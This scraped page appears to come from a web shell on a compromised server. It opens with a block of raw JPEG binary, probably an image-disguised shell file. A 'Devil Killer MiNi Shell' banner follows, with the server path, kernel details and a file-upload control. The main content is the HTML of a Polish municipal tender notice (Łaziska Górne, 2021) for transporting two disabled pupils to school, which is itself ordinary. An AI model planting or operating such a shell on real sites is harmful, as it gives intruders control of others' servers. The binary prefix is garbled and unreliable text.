JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210625/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210625/0009515901-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00095159 z dnia 2021-06-25</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz i odwóz 2 uczniów niepełnosprawnych z terenu Łazisk Górnych uczęszczających do klas integracyjnych w Szkole Podstawowej nr 6 im. Jana Pawła II w Łaziskach Górnych, ul. Wyrska 4 wraz z opieką </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Łaziska Górne</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276257601</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Ratuszowy 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łaziska Górne</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-170</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22C - Tyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 324 80 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">32 324 80 06</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@laziska.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.laziska.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz i odwóz 2 uczniów niepełnosprawnych z terenu Łazisk Górnych uczęszczających do klas integracyjnych w Szkole Podstawowej nr 6 im. Jana Pawła II w Łaziskach Górnych, ul. Wyrska 4 wraz z opieką </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-28d9cef5-d58d-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00095159</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001356/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Dowóz i odwóz 2 uczniów niepełnosprawnych z terenu Łazisk Górnych uczęszczających do klas integracyjnych w Szkole Podstawowej nr 6 im. Jana Pawła II w Łaziskach Górnych, ul. Wyrska 4 wraz z opieką</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl, https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, odbywa się przy użyciu miniPortalu , który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej na adres e-mail: zp@laziska.pl, przy czym złożenie ofert odbywa się na zasadach określonych w pkt 18<br/>SWZ. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz formularza do komunikacji. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej ( ePUAP). Wykonawca<br/>przystępując do niniejszego postępowania o udzielenie zamówienia publicznego akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego regulaminu. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: formularza złożenia, zmiany, wycofania oferty lub wniosku oraz formularza do komunikacji wynosi 150 MB.Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">28.1	W związku z wejściem w życie Rozporządzenie Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) ,dalej „RODO”, informuję, co następuje:<br/> zgodnie z art. 13 ust. 1 i 2 RODO, informuję, że: <br/>- administratorem Pani/Pana danych osobowych jest: Burmistrz Miasta Łaziska Górne z siedzibą władz w Urzędzie Miasta Łaziska Górne, Plac Ratuszowy 1, 43-170 Łaziska Górne; <br/>- administrator wyznaczył Inspektora Ochrony Danych, z którym może się Pani/Pan skontaktować w sprawach związanych z ochroną danych osobowych w następujący sposób: pod adresem poczty elektronicznej: iod@laziska.pl; pisemnie na adres siedziby Administratora; <br/>28.2	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. C RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na zadanie pn.: „Dowóz i odwóz 2 uczniów niepełnosprawnych z terenu Łazisk Górnych uczęszczających do klas integracyjnych w Szkole Podstawowej nr 6 im. Jana Pawła II w Łaziskach Górnych, ul. Wyrska 4 wraz z opieką”, znak sprawy: RZPK.271.11.2021 prowadzonym w trybie podstawowym bez przeprowadzenia negocjacji; <br/> odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz.U. z 2019 r. poz. 2019 z późn.zm.), <br/>- ponadto dane osobowe mogą zostać udostępnione organom uprawnionym na podstawie przepisów prawa;<br/>- Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 ustawy Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały okres trwania umowy. Następnie dane osobowe będą przechowywane w celach archiwalnych przez okres określony w rozporządzeniu Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych, chyba że przepisy szczególne stanowią inaczej, a w przypadku zamówień dofinansowanych ze środków zewnętrznych – przez okres trwałości projektu;<br/>Ciąg dalszy w sekcji IX niniejszego ogłoszenia – pozostałe informacje</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">j.w. oraz zgodnie z treścią pkt 28 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RZPK.271.11.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 291304,63 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 33745,37 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są usługi dowozu i odwozu 2 uczniów niepełnosprawnych z terenu Łazisk Górnych uczęszczających do klas integracyjnych w Szkole Podstawowej nr 6 im. Jana Pawła II w Łaziskach Górnych, ul. Wyrska 4 wraz z opieką nad nimi w czasie tych przewozów z domu do szkoły i z powrotem.<br/>Zakres przedmiotu zamówienia obejmuje m.in. następujące informacje:<br/>- ilość km do przejechania w jedną stronę–około 6,5–czyli w ciągu dnia około 13 km. <br/>- przewóz będzie odbywał się w dni robocze wynikające z zajęć szkolnych tj. nie wcześniej niż od 1 września 2021 roku do 24 czerwca 2022 roku.<br/>-usługa realizowana będzie od poniedziałku do piątku z wyłączeniem dni wolnych od zajęć dydaktyczno-wychowawczych i opiekuńczych tj. ferii zimowych i letnich, zimowej i wiosennej przerwy świątecznej. W przypadku dodatkowych dni wolnych od zajęć dydaktyczno-wychowawczych np. takich jak dni egzaminów, rekolekcji dowóz będzie organizowany na życzenie rodziców. <br/>- szacunkowa liczba dni dowozu uczniów niepełnosprawnych wynosi od września do grudnia 2021r.- 86 dni, od stycznia do czerwca 2022r. – 111 dni. Ilość dni dowozu liczona jest od dnia 1 września 2021r.do 24 czerwca 2022r. i może ulec zmianie, gdy uczniowie niepełnosprawni np. będą realizowali nauczanie zdalnie od 1 września 2021r. do 31 grudnia 2021r. oraz od 2 stycznia 2022r. do 24 czerwca 2022r. w przypadku zawieszenia zajęć lekcyjnych spowodowanych przedłużającą się pandemią COVID-19 lub epidemią, wprowadzeniem stanu klęski żywiołowej itp. <br/>- wykonawca zapewnia pojazd z kierowcą oraz opiekę nad uczniami niepełnosprawnymi w czasie dowozu i odwozu ze szkoły.<br/>Szczegółowy opis przedmiotu zamówienia i jego zakres został określony w załącznikach do specyfikacji – „Przedmiot zamówienia” oraz w „Projektowane postanowienia umowy”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-06-24</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">kryteria oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu i spełniają warunki udziału w postępowaniu o których mowa art.112 ust.2 ustawy Pzp dotyczące:<br/>1.	zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie określa warunku w tym zakresie.<br/>2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Na potwierdzenie spełnienia warunku dotyczącego uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów, wykonawca winien wykazać, że posiada odpowiednią licencję na wykonywanie krajowego transportu drogowego w zakresie przewozu osób:<br/>1) samochodem osobowym, lub<br/>2) pojazdem samochodowym przeznaczonym konstrukcyjnie do przewozu powyżej 7 i nie więcej niż 9 osób łącznie z kierowcą, lub<br/>3) taksówką<br/>wydaną na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym lub aktualne zezwolenie na wykonywanie zawodu przewoźnika drogowego zgodnie z wymaganiami ustawy j.w. Zezwolenia lub licencje na wykonywanie krajowego transportu drogowego osób, udzielone na podstawie uprzednio obowiązujących przepisów będą akceptowane, jeżeli zachowały moc prawną, nie wygasły bądź nie zostały cofnięte.<br/>Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust 2 pkt 2 jest spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi do których realizacji te uprawnienia są wymagane.<br/><br/>3.	sytuacji ekonomicznej lub finansowej.<br/>Zamawiający nie określa warunku w tym zakresie.<br/>4.	zdolności technicznej lub zawodowej. <br/>Na potwierdzenie spełnienia warunku dotyczącego zdolności technicznej lub zawodowej:<br/>a) wykonawca winien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał lub wykonuje co najmniej jedną usługę polegającą na dowozie uczniów do szkół, usługa winna być wykonywana w sposób ciągły przez okres nie krótszy niż 6 miesięcy.<br/>UWAGA: <br/>1)	Potwierdzenie spełniania warunku w zakresie zdolności technicznej lub zawodowej nastąpi w „Wykazie usług wykonanych” (Załączniku nr 5 do SWZ) .<br/>2)	Warunek udziału w postępowaniu dotyczący zdolności zawodowej (doświadczenia) musi być spełniony:<br/>-	przez wykonawcę samodzielnie, lub: <br/>-	przez jeden podmiot udostępniający wiedzę i doświadczenie (podwykonawcę) samodzielnie,<br/>-	w przypadku wykonawców występujących wspólnie: samodzielnie przez jednego z wykonawców występujących wspólnie,<br/><br/>b) wykonawca winien wykazać, że skieruje do realizacji zamówienia: <br/>- minimum 1 kierowcę i minimum 1 opiekuna uczniów, które będą uczestniczyć w wykonywaniu zamówienia.<br/>Potwierdzenie spełniania powyższego warunku w zakresie zdolności technicznej lub zawodowej nastąpi w Wykazie osób skierowanych do realizacji zamówienia (Załącznik nr 6 do SWZ) .<br/>Wykazując spełnienie warunku zdolności technicznej lub zawodowej wykonawca winien mieć na uwadze regulacje zart. 117 ust.3 oraz 118 ust.2 ustawy Pzp tj.:<br/>- w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <br/>- w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	„Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane, lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów- oświadczenie Wykonawcy. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich trzech miesięcy. <br/>Wykaz należy sporządzić w oparciu o wzór stanowiący załącznik nr 5 do SWZ. <br/>W wykazie należy wykazać usługi, o których mowa w pkt 9.1.4.a) SWZ.<br/>Okres wyrażony w latach, o którym mowa w pkt 10.3.1 liczy się wstecz od dnia - - w którym upływa termin składania ofert,<br/>- złożenia podmiotowego środka dowodowego o którym mowa w pkt 10.3.1, w przypadkach o których mowa w art.455 ust.1 pkt 2 lit. b oraz 462 ust.7 ustawy Pzp.<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi wykonawcami, wykaz o którym mowa w pkt 10.3.1, dotyczy usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.<br/><br/>2. „Wykaz osób, skierowanych do realizacji zamówienia”, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. <br/>Wykaz należy sporządzić według wzoru stanowiącego załącznik nr 6 do specyfikacji. W wykazie należy wykazać osoby skierowane do realizacji zadania, o których mowa w pkt 9.1.4 b) specyfikacji.<br/><br/>3.	aktualną licencję na wykonywanie krajowego transportu drogowego, wydaną na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym lub aktualne zezwolenie na wykonywanie zawodu przewoźnika drogowego zgodnie z wymaganiami ustawy z dnia 6 września 2001 r. o transporcie drogowym, o której mowa w pkt 9.1.2 SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Formularz ofert – zgodnie z zał. Nr 1<br/>2.	Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym w pkt. 9.1 i 9.2 SWZ. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu na dzień składania ofert. Oświadczenie należy złożyć zgodnie ze wzorem stanowiącym załącznik nr 4 do SWZ. Oświadczenie, o którym mowa w pkt. 10.1.2 składają odrębnie:<br/>a)	Wykonawca/każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia (wzór stanowi załącznik nr 4 do SWZ) W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>b)	podmiot udostępniający zasoby, na którego potencjał powołuje się Wykonawca celem potwierdzenia spełnienia warunków udziału w postępowaniu (wzór stanowi załącznik nr 8b do SWZ). W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby 